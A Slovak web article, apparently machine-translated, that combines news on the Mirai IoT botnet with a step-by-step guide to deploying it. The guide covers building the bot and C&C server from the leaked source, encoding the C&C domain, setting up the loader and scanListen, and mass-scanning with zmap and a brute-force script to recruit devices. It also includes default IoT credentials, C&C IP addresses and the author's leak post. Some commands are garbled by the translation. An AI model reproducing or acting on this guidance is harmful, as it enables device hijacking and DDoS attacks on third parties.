Zdrojový kód Mirai. Inštalácia a konfigurácia botnetu Mirai. Princíp fungovania Mirai

Vo svojom jadre funguje Mirai jednoducho: prehľadáva internet a hľadá zariadenia internetu vecí prístupné cez telnet, ktoré sú zraniteľné voči hrubej sile a hackerom. Malvér primárne napáda monitorovacie kamery, DVR a smerovače a potom sa ďalej množí ako červ.

Z DDoS útokov vykonaných týmto botnetom nedávno a najväčším v Európe. Špičkový výkon útoku dosiahol 620 Gbit/s a viac ako 1 Tb/s. Na dosiahnutie takýchto výsledkov útočníci použili zaplavenie UDP, DNS a HTTP, ako aj pakety GRE (Generic Routing Encapsulation), ktoré odborníci považovali za veľmi neobvyklé.

Závery špecialistov MalwareTech sa vo všeobecnosti zhodujú s týmito pozorovaniami. Počas dvanástich hodín teda výskumníci zaznamenali približne 72 000 jedinečných adries IP a každú hodinu sa objavilo 4 000 nových adries IP. Z toho analytici dospeli k záveru, že veľkosť botnetu je veľmi skromná - iba asi 120 000 zariadení denne. A hoci je botnet oveľa väčší a čísla sú 1-1,5 milióna robotov, výskumníci z MalwareTech ani špecialisti z Akamai s tým nesúhlasia.

„Mirai, ktorý bol predtým do značnej miery ignorovaný kvôli jednoduchosti útokov cez telnet, sa minulý týždeň stal hlavnou témou diskusií v médiách po celom svete, pričom orgány činné v trestnom konaní začali vyšetrovanie s podporou mnohých medzinárodných spoločností,“ píšu vedci. . „Je vysoko pravdepodobné, že silné DDoS útoky sa teraz stanú bežnejšou praxou, pretože hackeri nájdu čoraz zraniteľnejšie zariadenia internetu vecí alebo začnú infikovať zariadenia chránené NAT. Rozhodne nastal čas, aby výrobcovia predvolene prestali vydávať zariadenia s globálnymi heslami a prešli na vydávanie zariadení s náhodne vygenerovanými heslami na spodnej strane puzdra.“

Vedci z MalwareTech okrem správy zahrnuli aj video s mapou infekcií Mirai (pozri nižšie). Na webovej stránke výskumníkov nájdete aj interaktívnu mapu botnetu, ktorá sa aktualizuje v reálnom čase.

Budeme potrebovať dva VPS KVM servery a doménu. Virtualizácia je KVM, OpenVZ tentokrát chýba.

Beriem servery sem -

Nainštalujeme samotný botnet na jeden server a skenujeme roboty na druhý. (brutálne)

DÔLEŽITÉ. Servery musia byť založené na Debiane 8 a musia mať aspoň 1 GB RAM.

Akákoľvek doména, na tom nezáleží.

Prepáčte, samozrejme, ale nepoviem vám, ako pripojiť doménu k VPS. Nie je to ťažké, prídete na to sami.

PuTTY a začnime.

# apt-get update -y

# apt-get upgrade -y

# apt-get install rozbaľte gcc golang obrazovky elektrického plotu sudo git -y

# apt-get install mysql-server -y

# apt-get install mysql-client -y

# apt-get install apache2 -y

Pri inštalácii MySQL budete musieť vytvoriť heslo pre prístup k MySQL pre užívateľa root. Prídete s normálnym heslom bez akéhokoľvek „qwerty“

Niekam si to zapíšte, budeme to znova potrebovať.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y

#bash< <(curl -s -S -L

Pre zobrazenie odkazov musíte byť zaregistrovaní.

# gvm install go1.4

# gvm použite go1.4 [--default]

# gvm install go1.4 -B

# gvm použite go1.4

# export GOROOT_BOOTSTRAP=$GOROOT

# gvm install go1.5

# gvm použite go1.5

# gvm install go1.8

# gvm použite go1.8

Po nainštalovaní všetkých nástrojov si stiahnite zdroje botov -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

A nahrajte ho na server. Tím wget alebo jednoducho prostredníctvom programu WinSCP.

# unzip Mirai-Source-Code-master.zip

# cd Mirai-Source-Code-Master/mirai/tools

# gcc enc.c -o enc

# ./enc string ********(napíšeme našu doménu, ktorá je pripojená k serveru) a stlačte Enter.

Tu uvidíte nasledujúci text -

XOR s 14 bajtmi údajov...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22

14 - tu budete mať iné číslo, takže sa nebojte, všetko je správne.

Celý tento text skopírujeme.

Otvoriť cez nano editor alebo cez WinSCP súbor tabuľka.c ktorý je v priečinku mirai/bot

Toto treba vidieť -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

Linka add_entry(TABLE_CNC_DOMAIN- zmeňte všetko v úvodzovkách na svoj text, ktorý ste práve skopírovali. Namiesto " 30 " Napíšeme svoje číslo, ktoré sme tiež len skopírovali. To isté robíme s linkou add_entry(TABLE_SCAN_CB_DOMAIN

Uložte a zatvorte editor.

Otvorte súbor pomocou editora mirai/cnc/main.go

Toto vidíme -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

"127.0.0.1" zmeniť na "127.0.0.1:3306"

"heslo" Zmeníme heslo, ktoré sme predtým zadali, na naše MySQL. "

Uložte súbor a zatvorte editor.

Len skopírujte všetky tie svinstvá, nepoviem vám, prečo je to potrebné -

# mkdir /etc/xcompile

# cd /etc/xcompile

#wget

Pre zobrazenie odkazov musíte byť zaregistrovaní.

#wget

Pre zobrazenie odkazov musíte byť zaregistrovaní.

#wget

Pre zobrazenie odkazov musíte byť zaregistrovaní.

#wget

Pre zobrazenie odkazov musíte byť zaregistrovaní.

#wget

Pre zobrazenie odkazov musíte byť zaregistrovaní.

#wget

Pre zobrazenie odkazov musíte byť zaregistrovaní.

#wget

Pre zobrazenie odkazov musíte byť zaregistrovaní.

#wget

Pre zobrazenie odkazov musíte byť zaregistrovaní.

#wget

Pre zobrazenie odkazov musíte byť zaregistrovaní.

# tar -jxf cross-compiler-armv4l.tar.bz2

# tar -jxf cross-compiler-i586.tar.bz2

# tar -jxf cross-compiler-m68k.tar.bz2

# tar -jxf cross-compiler-mips.tar.bz2

# tar -jxf cross-compiler-mipsel.tar.bz2

# tar -jxf cross-compiler-powerpc.tar.bz2

# tar -jxf cross-compiler-sh4.tar.bz2

# tar -jxf cross-compiler-sparc.tar.bz2

# tar -jxf cross-compiler-armv6l.tar.bz2

# rm *.tar.bz2

# mv krížový kompilátor-armv4l armv4l

# mv cross-compiler-i586 i586

#mv krížový kompilátor-m68k m68k

# mv cross-compiler-mips mips

# mv cross-compiler-mipsel mipsel

# mv cross-compiler-powerpc powerpc

# mv cross-compiler-sh4 sh4

# mv cross-compiler-sparc sparc

# mv krížový kompilátor-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin

# export PATH=$PATH:/etc/xcompile/i586/bin

# export PATH=$PATH:/etc/xcompile/m68k/bin

# export PATH=$PATH:/etc/xcompile/mips/bin

# export PATH=$PATH:/etc/xcompile/mipsel/bin

# export PATH=$PATH:/etc/xcompile/powerpc/bin

# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin

# export PATH=$PATH:/etc/xcompile/sh4/bin

# export PATH=$PATH:/etc/xcompile/sparc/bin

# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin

# export GOPATH=$HOME/Documents/go

# prejdite na github.com/go-sql-driver/mysql

# prejdite na github.com/mattn/go-shellwords

# cd Mirai-Source-Code-master/mirai

# ./build.sh ladenie telnetu

# ./build.sh uvoľní telnet

# mv mirai* /var/www/html

# cd /var/www/html

#mkdirbins

#mv*bins/

Teraz MySQL.

# mysql -u root -p

Tu budete požiadaní o heslo. Zadajte heslo, ktoré ste predtým nastavili.

# vytvoriť databázu mirai;

# použite mirai

Teraz skopírujte celý text odtiaľto -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

Vložte ho a stlačte Enter.

Skopírujte text odtiaľto -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

Namiesto Anna-senpai napíšte svoje prihlasovacie meno. Akýkoľvek. To isté s myawesomepassword. Tieto údaje budeme potrebovať na prístup k ovládaciemu panelu robotov.

Malo by to byť takto - INSERT INTO users VALUES (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");

Skopírujte, prilepte, stlačte Enter.

Teraz môžete ísť von.

Už je to skoro hotové.

# cd Mirai-Source-Code-master/mirai/release

# touch prompt.txt

# obrazovka ./cnc

Treba vidieť nápis MySQL DB bola otvorená

Túto reláciu nezatvárame, otvárame novú.

Pre zobrazenie odkazov musíte byť zaregistrovaní.

Namiesto ******** napíšte svoju doménu a kliknite na Otvoriť.

Zadajte svoje používateľské meno a heslo, v mojom prípade je to -

zaebalsjapisatj

To je všetko, sme v ovládacom paneli robotov.

Teraz potrebujeme roboty. Všetko je tu jednoduché, nie sú potrebné žiadne inštalácie.

Poďme nakonfigurovať loader.

Loader je potrebný, aby bolo možné pridávať roboty z textových súborov. Povedzme, že sme vytvorili veľa zariadení (smerovačov, fotoaparátov, telefónov) a na ich pridanie do robota potrebujeme nakladač.

Nakladač je tiež „červ“

Pripojte sa k nášmu serveru cez PuTTY a WinSCP.

Pomocou WinSCP nájdeme súbor main.c v priečinku Mirai-Source-Code-master/dlr

Zapisujeme IP nášho servera ako na obrázku -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

Čiarky necháme, tak to má byť. Uložiť a zavrieť.

Teraz s PyTTY choď na náš server a napíš -

# cd Mirai-Source-Code-master/dlr

# chmod 777 *

# ./build.sh

# vydanie CD

# mv dlr* ~/Mirai-Source-Code-master/loader/bins

Teraz poďme otvoriť WinSCP a nájdite súbor main.c v priečinku Mirai-Source-Code-master/loader/src

Zmeníme ju na našu IP ako na snímke obrazovky -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

Uložiť a zavrieť.

Cez PuTTY -

# ./build.sh

Používaním WinSCP otvorte súbor scanListen.go ktorý nájdete v priečinku Mirai-Source-Code-master/mirai/tools

Zmeňte IP adresu svojho servera -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

Potom s PyTTY -

# cd Mirai-Source-Code-master/mirai/tools

# choďte vytvoriť scanListen.go

Teraz máme nový súbor - scanPočúvajte(bez .choď, Len scanPočúvajte)

scanPočúvajte je potrebné presunúť do priečinka Mirai-Source-Code-master/loader

Len s pomocou WinSCP vložte ho do priečinka nakladač

Teraz skontrolujeme, či všetko funguje

# ./loader

Ak vidíte, čo je na obrazovke, potom je všetko správne -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

Ak sa vyskytnú chyby, napíšte do témy, pomôžem.

Ak chcete stiahnuť roboty zo zoznamu, presuňte textový súbor do priečinka nakladač a zadajte príkaz -

# zoznam mačiek.txt | ./nakladač

To je všetko, všetci roboti, ktorých ste naverbovali, budú s vami, na váš príkaz budú búrať stránky.

Osobne som túto metódu nepoužil, našiel som jednoduchší spôsob.

Tu potrebujeme druhý server. Tiež na Debian 8.

# apt-get update -y

# apt-get upgrade -y

# apt-get install python-paramiko -y

# apt-get install zmap -y

zmap potrebujeme to na skenovanie portov. Princíp činnosti je rovnaký ako KPortScan, len 50-krát rýchlejšie.

Skopírujte celý kód odtiaľto -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

A uložiť ako scan.py

Tu môžete pridať svoje heslá a prihlasovacie údaje -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

Reťazec kombo nedotýkajte sa!

Tu musíte zaregistrovať IP servera, na ktorom sa robot nachádza -

Pre zobrazenie odkazov musíte byť zaregistrovaní.

Všetko zmeníme a uložíme.

Súbor scan.py umiestnime kamkoľvek na náš server. Na druhom serveri, ktorý je čisto na skenovanie, ten, na ktorom sa robota nedotýkame.

Potrebujeme IP adresy, ktoré budeme skenovať.

#zmap -p22 -o zoznam.txt -B 100M(môžete skenovať iné porty, ja som vždy skenoval 22 alebo 23)

Všetky výsledky budú v súbore list.txt

Po zhromaždení súboru IP (čím viac, tým lepšie). list.txt hodiť to vedľa súboru scan.py a napíš -

# python scan.py list.txt 500

To je všetko, sedíme a sledujeme, ako náš botnet rastie.

Keď je tam aspoň 200 robotov, môžete spustiť nakladač.

Ak to chcete urobiť, prejdite na server, kde je botnet nainštalovaný, a -

# cd Mirai-Source-Code-master/loader

# ulimit -n 9999999

# ./scanListen | ./nakladač

Teraz bude robot fungovať ako „červ“ a dokončí viac robotov.

Minulý týždeň unikol online zdrojový kód pre komponenty botnetu Mirai, používaného pri rekordných DDoS útokoch s kapacitou až 1 Tb/s.

čl. 273 Trestného zákona Ruskej federácie. Tvorba, používanie a distribúcia škodlivých počítačových programov

1. Vytváranie, distribúcia alebo používanie počítačových programov alebo iných počítačových informácií, vedome určených na neoprávnené zničenie, blokovanie, modifikáciu, kopírovanie počítačových informácií alebo neutralizáciu prostriedkov ochrany počítačových informácií, -

potresce sa obmedzením slobody až na štyri roky alebo nútenými prácami až na štyri roky, alebo odňatím slobody na ten istý čas s peňažným trestom do dvestotisíc rubľov alebo výšku mzdy alebo iného príjmu odsúdeného po dobu až osemnástich mesiacov.

2. Činy uvedené v prvej časti tohto článku, spáchané skupinou osôb predchádzajúcim sprisahaním alebo organizovanou skupinou alebo osobou využívajúcou svoje úradné postavenie, ako aj také, ktoré spôsobili veľkú škodu alebo boli spáchané zo sebeckého záujmu , -

potresce sa obmedzením slobody až na štyri roky alebo nútenými prácami až na päť rokov s odňatím práva zastávať určité funkcie alebo vykonávať určité činnosti až na tri roky alebo bez toho alebo trest odňatia slobody až na päť rokov s peňažným trestom stotisíc až dvestotisíc rubľov alebo vo výške mzdy alebo iného príjmu odsúdeného na dva až tri roky alebo bez neho a s alebo bez odňatia práva zastávať určité funkcie alebo vykonávať určité činnosti na obdobie až troch rokov.

3. Činy uvedené v prvej alebo druhej časti tohto článku, ak mali vážne následky alebo vytvorili hrozbu ich výskytu, -

potrestá sa odňatím slobody až na sedem rokov.

Tento botnet pozostáva hlavne z kamier, DVR zariadení atď.

Infekcia sa vyskytuje celkom jednoducho: Internet je skenovaný na otvorené 80/23 (web/telnet) porty a sú vybrané pevne zakódované účty.

Len málo používateľov mení heslá svojich vstavaných účtov (ak je to možné), takže botnet je neustále dopĺňaný novými zariadeniami. Ak môžete zmeniť heslo pre webové rozhranie v ňom, potom heslo a samotná prítomnosť prístupu telnet mnohým používateľom jednoducho uniká.

Najčastejšie používané účty sú:

enable:system
shell:sh
admin:admin
root:xc3511
koreň:vizxv
root:admin
root: xmhdipc
root:123456
koreň: 888888
podpora:podpora
koreň:54321
koreň: juantech
koreň:anko
koreň:12345
správca:
root:default
admin: heslo
root:root
koreň:
user:user
admin: smcadmin
root:pass
admin:admin1234
koreň:1111
hosť: 12345
koreň: 1234
root: heslo
koreň:666666
admin: 1111
služba: služba
root:system
supervízor: supervízor
root:klv1234
správca: 1234
root:ikwb
koreň: Zte521

Po získaní prístupu dostane príkazové centrum binárne upozornenie o prítomnosti nového robota:

4a 9a d1 d1 = XXX.XXX.XXX.XXX (adresa hostiteľa bola tu)
05 = Tab
17 = 23 (Port 23 Telnet)
05 = Tab
61 64 6d 69 6e = používateľské meno: admin admin
05= Tab
61 64 6d 69 6e = heslo používateľa: admin

Komponenty botnetu sú navrhnuté tak, aby fungovali v rôznych prostrediach, o čom svedčia identifikované vzorky:

mirai.arm
mirai.arm7
mirai.mips
mirai.ppc
mirai.sh4

Príkazové servery sa momentálne nachádzajú na nasledujúcich adresách:

103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11

Návod na vytvorenie botnetu je celkom jednoduchý, tu je taký, aký je (zdroj http://pastebin.com/E90i6yBB):

Ahojte všetci,

Keď som prvýkrát vstúpil do priemyslu DDoS, neplánoval som v ňom zostať dlho. Zarobil som si peniaze, na IOT sa teraz pozerá veľa očí, takže je čas na GTFO. Poznám však každý šmyk a ich mamu, je ich mokrým snom mať niečo iné ako qbot.

Takže dnes mám pre vás úžasné vydanie. S Mirai väčšinou len z telnetu vytiahnem max 380k botov. Po Kreb DDoS sa však poskytovatelia internetových služieb pomaly vypínali a čistili svoj čin. Dnes je maximálny ťah okolo 300 000 robotov a klesá.

Takže som tvoj senpai a budem sa k tebe správať veľmi milo, môj hf-chan.

A všetkým, ktorí si mysleli, že robia niečo tým, že zasiahnu moje CNC, som sa dobre zasmial, tento robot používa doménu pre CNC. Opätovné pripojenie všetkých robotov trvá 60 sekúnd, lol

Tiež kričte na tento blogový príspevok od malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Veľmi som si vás vážil, myslel som si, že ste dobrý reverzor, ale naozaj ste úplne a úplne zlyhali v obrátení tejto dvojhviezdy. „Stále máme lepšie kung-fu ako vy, deti“, nerozosmievajte ma, prosím, urobili ste toľko chýb a dokonca ste si pomýlili rôzne binárne súbory s mojimi. LOL

Dovoľte mi vrátiť vám pár faciek...
1) port 48101 nie je na spätné pripojenie, slúži na ovládanie, aby sa zabránilo viacerým inštanciám spustenia robotov súčasne
2) /dev/watchdog a /dev/misc neslúžia na „spôsobenie oneskorenia“, ale na zabránenie zamrznutiu systému. Toto je nízko visiace ovocie, také smutné, že si extrémne hlúpy
3) Neuspeli ste a mysleli ste si, že FAKE_CNC_ADDR a FAKE_CNC_PORT sú skutočné CNC, lol „A robíte zadné vrátka na pripojenie cez HTTP na 65.222.202.53.“ tok signálu ťa podrazil ;) skús tvrdší šmyk
4) Váš nástroj na kostru je na prdel, myslel si, že dekodér útoku je „štýl Sinden“, ale nepoužíva ani textový protokol? CNC a bot komunikujú cez binárny protokol
5) poviete ‚chroot(“/”) tak predvídateľný ako torlus‘, ale nerozumiete, niektorí iní zabíjajú na základe cwd. Ukazuje, ako mimochodom ste so skutočným malvérom. Vráťte sa do skidlandu

Prečo píšete nástroje reverzného inžinierstva? V prvom rade nemôžete ani správne cúvať. Najprv sa naučte nejaké zručnosti, kým sa pokúsite zapôsobiť na ostatných. Tvoja arogancia pri vyhlasovaní, ako si ma „porazil“ svojím hlúpym kung-fu výrokom, ma pri jedle tak rozosmiala, takže ma musel potľapkať po chrbte.

Tak ako ja budem navždy slobodný, aj ty budeš navždy odsúdený na priemernosť.

Požiadavky
2 servery: 1 pre CNC + mysql, 1 pre prijímač skenovania a 1+ pre načítanie

Požiadavky na OP
2 VPS a 4 servery
— 1 VPS s extrémne nepriestrelným hostiteľom pre databázový server
— 1 VPS, rootkitted, pre scanReceiver a distribútora
— 1 server pre CNC (používaný ako 2 % CPU so 400 000 robotmi)
— 3x 10gbps NForce servery na načítanie (distribútor distribuuje rovnomerne na 3 servery)

— Ak chcete vytvoriť pripojenie k CNC, roboty vyriešia doménu (resolv.c/resolv.h) a pripoja sa k tejto IP adrese
— Roboty brutálny telnet využívajúci pokročilý skener SYN, ktorý je približne 80x rýchlejší ako ten v qbot a využíva takmer 20x menej zdrojov. Keď robot nájde brutálny výsledok, vyrieši inú doménu a nahlási to. Toto je priradené k samostatnému serveru, aby sa automaticky načítalo do zariadení, keď prídu výsledky.
— Hrubé výsledky sa štandardne odosielajú na port 48101. Nástroj s názvom scanListen.go v nástrojoch sa používa na prijímanie skreslených výsledkov (na špičke som dostával približne 500 skreslených výsledkov za sekundu). Ak zostavujete v režime ladenia, mali by ste vidieť binárny súbor programu scanListen v priečinku ladenia.

Mirai používa mechanizmus šírenia podobný self-rep, ale to, čo nazývam „zaťaženie v reálnom čase“. V podstate, roboty brutálne výsledky, pošlite ich na server, ktorý počúva s nástrojom scanListen, ktorý pošle výsledky do nakladača. Táto slučka (brute -> scanListen -> load -> brute) je známa ako načítanie v reálnom čase.

Loader môže byť nakonfigurovaný tak, aby používal viacero IP adries na obídenie vyčerpania portov v linuxe (k dispozícii je obmedzený počet portov, čo znamená, že nie je dostatok variácií v n-tici na získanie viac ako 65 000 súčasných odchádzajúcich pripojení – teoreticky je táto hodnota veľa menej). Mal by som možno 60 000 – 70 000 simultánnych odchádzajúcich pripojení (súčasné načítanie) rozložených na 5 IP.
Bot má niekoľko možností konfigurácie, ktoré sú v (table.c/table.h) nejasné. V súbore ./mirai/bot/table.h môžeš nájdete väčšinu popisov možností konfigurácie. V súbore ./mirai/bot/table.c však existuje niekoľko možností, ktoré *musíte* zmeniť, aby ste mohli pracovať.

— TABLE_CNC_DOMAIN — Názov domény CNC na pripojenie — Vyhýbanie sa DDoS veľmi zábavné s mirai, ľudia sa snažia zasiahnuť moje CNC, ale aktualizujem ho rýchlejšie, než dokážu nájsť nové IP adresy, lol. retardi :)
— TABLE_CNC_PORT — Port na pripojenie, je už nastavený na 23
— TABLE_SCAN_CB_DOMAIN — Pri hľadaní hrubých výsledkov je táto doména nahlásená
— TABLE_SCAN_CB_PORT — Port, ku ktorému sa chcete pripojiť, aby ste dosiahli brutálne výsledky, je už nastavený na 48101.

V ./mirai/tools nájdete niečo, čo sa volá enc.c – toto musíte skompilovať, aby ste získali výstup vecí, ktoré sa vložia do súboru table.c

Spustite v tomto adresári mirai

./build.sh ladenie telnetu

Ak ste ich nenakonfigurovali, dostanete nejaké chyby súvisiace s tým, že krížové kompilátory neexistujú. To je v poriadku, neovplyvní to kompiláciu nástroja enc

Teraz by ste v priečinku ./mirai/debug mali vidieť skompilovaný binárny súbor s názvom enc. Ak chcete napríklad získať zahmlený reťazec pre názov domény, ku ktorému sa môžu roboty pripojiť, použite toto:

./debug/enc string fuck.the.police.com
Výstup by mal vyzerať takto

XOR 20 bajtov dát…
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
Ak chcete napríklad aktualizovať hodnotu TABLE_CNC_DOMAIN, nahraďte tento dlhý hexadecimálny reťazec reťazcom, ktorý poskytuje nástroj enc. Tiež vidíte "XOR'ing 20 bajtov dát". Táto hodnota musí nahradiť aj posledný argument. Takže napríklad riadok table.c pôvodne vyzerá takto
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //cnc.changeme.com
Teraz, keď poznáme hodnotu z nástroja enc, aktualizujeme ho takto

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22 ); //fuck.the.police.com
Niektoré hodnoty sú reťazce, iné port (uint16 v sieťovom poradí / big endian).
KONFIGURÁCIA CNC:
apt-get nainštalovať mysql-server mysql-client

CNC vyžaduje na fungovanie databázu. Keď inštalujete databázu, prejdite do nej a spustite nasledujúce príkazy:
http://pastebin.com/86d0iL9g

Tým sa vám vytvorí databáza. Ak chcete pridať svojho používateľa,

INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
Teraz prejdite do súboru ./mirai/cnc/main.go

Upravte tieto hodnoty
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "heslo"
const DatabaseTable string = "mirai"
K informáciám pre mysql server práve ste nainštalovali

Krížové kompilátory sú jednoduché, nastavte ich podľa pokynov na tomto odkaze. Aby sa tieto zmeny prejavili, musíte reštartovať systém alebo znova načítať súbor .bashrc.

http://pastebin.com/1rRCc3aD
CNC, bot a súvisiace nástroje:
http://dopefile.pk/a9f2n9ewk8om
Ako postaviť bot + CNC
V priečinku mirai je skript build.sh.
./build.sh ladenie telnetu

Vypíše ladiace binárne súbory robota, ktorý nebude démonizovať a vytlačí informácie o tom, či sa môže pripojiť k CNC atď., Stav záplav atď. Kompiluje sa do priečinka ./mirai/debug
./build.sh uvoľní telnet

Výstupom budú binárne súbory robotov pripravené na výrobu, ktoré sú extrémne orezané, malé (asi 60 kB), ktoré by sa mali nahrať do zariadení. Kompiluje všetky binárne súbory vo formáte: „mirai.$ARCH“ do priečinka ./mirai/release

Loader číta telnet položky z STDIN v nasledujúcom formáte:
ip:port user:pass
Zistí, či existuje wget alebo tftp, a pokúsi sa stiahnuť binárny súbor pomocou toho. Ak nie, načíta sa malý binárny súbor (asi 1 kb), ktorý bude stačiť ako wget.
./build.sh

Postaví nakladač, optimalizovaný, výrobné využitie, bez problémov. Ak máte súbor vo formátoch používaných na načítanie, môžete to urobiť
mačka súbor.txt | ./nakladač
Nezabudnite obmedziť!

Aby bolo jasné, neposkytujem žiadne výukové programy pomoci 1 na 1 alebo sračky, príliš veľa času. Zahrnuté sú všetky skripty a všetko na nastavenie fungujúceho botnetu za menej ako 1 hodinu. Som ochotný pomôcť, ak máte individuálne otázky (ako to, že sa CNC nepripája k databáze, urobil som to takto, bla bla), ale nie otázky typu „Môj robot sa nepripojil, opravte to“

Toto je trójsky kôň, o ktorom všetci písali posledných pár týždňov. Medzi najpôsobivejšie úspechy botnetov vytvorených s jeho pomocou patrí kapacita viac ako terabit a v malej africkej krajine.

Koľko počítačov za to zotročil?

Vôbec nie. Alebo aspoň veľmi málo. Cieľovými zariadeniami Mirai vôbec nie sú počítače, ale zariadenia internetu vecí – videorekordéry, fotoaparáty, hriankovače... Podľa štatistík Level 3 Communications bolo koncom októbra už asi pol milióna zariadení pod kontrolou Trojana.

A čo, môže chytiť akékoľvek fotoaparáty s chladničkami?

Nie naozaj. Mirai je prispôsobený pre zariadenia so systémom Busybox - zjednodušená sada nástrojov UNIX príkazový riadok, ktorý sa používa ako hlavné rozhranie v embedded operačné systémy. Trójsky kôň útočí len na určité platformy, ako sú ARM, ARM7, MIPS, PPC, SH4, SPARC a x86. Ohrozené sú len zariadenia s továrenským nastavením alebo veľmi slabou ochranou – k infekcii dochádza pomocou útoku hrubou silou na port Telnet, na ktorý sa používa predvolený zoznam poverení správcu.

Je akosi neefektívne hľadať na celom internete kamery bez hesiel – však?

Ale neuhádli správne. Novinár z The Atlantic si prenajal server a napísal program, ktorý predstiera, že je toustovač. Prvý útok na „domáci spotrebič“ nastal po 40 minútach! Počas nasledujúcich 11 hodín bol hriankovač hacknutý viac ako 300-krát. Faktom je, že botnety dosiahli bezprecedentné veľkosti a adresný priestor IPv4 je pre nich veľmi malý. Okrem toho je potrebné pripomenúť, že hackeri nevyhľadávajú zraniteľné zariadenia manuálne - to robia členovia botnetu. A keďže každý novo konvertovaný „zamestnanec“ tiež začína hľadať obete, botnet exponenciálne rastie.

Geometricky? Takže o rok budú botnety obsahovať bilióny zariadení?!

Samozrejme, že nie 😀 Faktom je, že počet IoT zariadení je konečný. A to je už dosť naliehavý problém. Autor Mirai priznáva, že maximálny počet zariadení v jeho sieti bol 380 tisíc a po niekoľkých útokoch, keď užívatelia a poskytovatelia začali prijímať ochranné opatrenia, počet zariadení klesol na 300 tisíc a naďalej klesá.

Po zverejnení zdrojového kódu Mirai ho začalo používať mnoho hackerov. V súčasnosti je počet veľkých botnetov založených na tomto trójskom koňovi asi 52. Stojí za to objasniť, že každé zariadenie môže patriť len do jednej siete – ihneď po zachytení zariadenia ho malvér chráni pred opätovnou infekciou. Jediný prípad, keď je možné zariadenie preniesť na iného „vlastníka“, je reštartovanie zariadenia. Podľa odborníkov bude po reštarte zariadenie do 30 sekúnd opäť infikované.

Účinnosť Mirai teda klesá?

Áno. Hackeri sú nútení bojovať o obmedzené množstvo zdrojov, ktoré (kvôli preventívnym opatreniam) skôr ubúda ako rastie. Situáciu ďalej komplikuje skutočnosť, že hackeri sú extrémne sebeckí – napríklad po jednoduchom vypnutí hlavného servera velenia a riadenia (C&C) botnetu – sa teraz botnet ukázal ako zbytočný a nezraniteľný voči novým útokom. Každý nová sieť založené na Mirai budú menšie ako tie predchádzajúce a budú môcť vykonávať iba nízkoenergetické útoky. Napríklad počas amerických volieb došlo k slabým útokom na stránky Clintonovej a Trumpa. Nespôsobili žiadnu škodu a vôbec si ich nikto nevšimol (okrem spoločnosti, ktorá špeciálne sleduje počínanie tohto trójskeho koňa).

To je jasné. Aké ďalšie zaujímavé informácie sú známe o tomto Trojanovi?

Ide o nástupcu ďalšieho trójskeho koňa, ktorý je známy pod menami Gafgyt, Lizkebab, BASHLITE, Bash0day, Bashdoor a Torlus. Ten je známy tým, že si podľa rovnakej komunikácie úrovne 3 dokáže podrobiť asi milión webových kamier. Je tiež známe, že väčšina botnetov nepoužíva čistú kópiu Mirai, ale ich vlastné, upravené verzie (čo sa celkom očakáva).

Ďalší zaujímavý fakt je, že používatelia RuNet našli v zdrojový kód Mirai Russian trace - v súbore cnc/admin.go je výstup komentárov v ruštine:

cnc/admin.go: this.conn.Write(byte(“\033))

Na druhej strane to vyzerá skôr ako vtip – „kontrola účtov...“ je očividná kópia (strojový preklad?) „kontrola účtov“.

Minulý mesiac došlo k útokom na veľké stránky ako napr Twitter alebo Spotify, ktoré ich dočasne deaktivovalo. Na to bol použitý botnet Mirai, ktorá združuje 400-500 tisíc zariadení internetu vecí. Teraz sa novinári na základnej doske dozvedeli, že dvom hackerom sa podarilo zmocniť sa kontroly nad botnetom a vytvoriť jeho novú verziu – spája už milión zariadení. Predplatitelia nemeckého poskytovateľa zažili jeho silu Deutsche Telekom, ktorej sieť vypadla minulý víkend.

Lov na Mirai

Novinárom sa podarilo porozprávať s jedným z týchto dvoch záhadných hackerov – používa prezývku BestBuy. V zašifrovanom online chate im povedal, že medzi hackermi prebieha skutočný boj o kontrolu nad Mirai. V jeho softvéri bola nedávno objavená zraniteľnosť. Jeho použitie v spojení s rýchlosťou by mohlo umožniť BestBuy a jeho partnerovi Popopret prevziať kontrolu nad väčšinou botnetu a pridať doň nové zariadenia.

